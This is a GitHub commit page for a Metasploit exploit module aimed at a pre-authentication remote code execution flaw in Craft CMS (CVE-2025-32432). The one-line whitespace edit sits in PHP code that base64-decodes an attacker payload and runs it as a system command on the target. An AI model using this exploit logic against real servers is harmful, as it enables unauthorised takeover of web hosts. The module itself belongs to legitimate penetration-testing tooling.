Skip to content

Commit 59b9249

Browse files
Chocapikkjvoisin
andauthored
Update modules/exploits/linux/http/craftcms_preauth_rce_cve_2025_32432.rb
Co-authored-by: Julien Voisin <[email protected]>
1 parent a0e9758 commit 59b9249

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

modules/exploits/linux/http/craftcms_preauth_rce_cve_2025_32432.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -93,7 +93,7 @@ def php_exec_cmd(encoded_payload)
9393

9494
<<~PHP
9595
#{php_preamble(disabled_varname: disabled_var)}
96-
$c = base64_decode("#{payload_b64}");
96+
$c=base64_decode("#{payload_b64}");
9797
#{php_system_block(cmd_varname: '$c', disabled_varname: disabled_var)}
9898
PHP
9999
end

0 commit comments

Comments
 (0)